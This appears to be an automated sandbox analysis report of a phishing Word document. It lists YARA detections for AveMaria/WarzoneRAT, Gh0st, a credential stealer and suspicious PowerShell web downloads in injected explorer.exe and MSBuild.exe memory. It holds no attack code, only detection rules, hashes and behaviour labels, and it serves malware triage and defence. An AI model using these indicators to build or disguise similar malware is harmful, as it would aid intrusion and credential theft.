          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000013.00000002.962831144.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 00000004.00000002.916223647.00000000000BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
          Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 00000009.00000002.937256768.0000000001BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 00000004.00000002.916438854.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 00000013.00000002.961202850.000000000010E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
          Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
          Source: 00000009.00000002.936976360.00000000003D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 1312, type: MEMORYSTRMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: Process Memory Space: powershell.exe PID: 2072, type: MEMORYSTRMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$em Selection - Inquiry 0054363AZH - AltayGlobal Trading.docJump to behavior
          Source: classification engineClassification label: mal100.phis.troj.expl.evad.winDOC@43/31@2/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
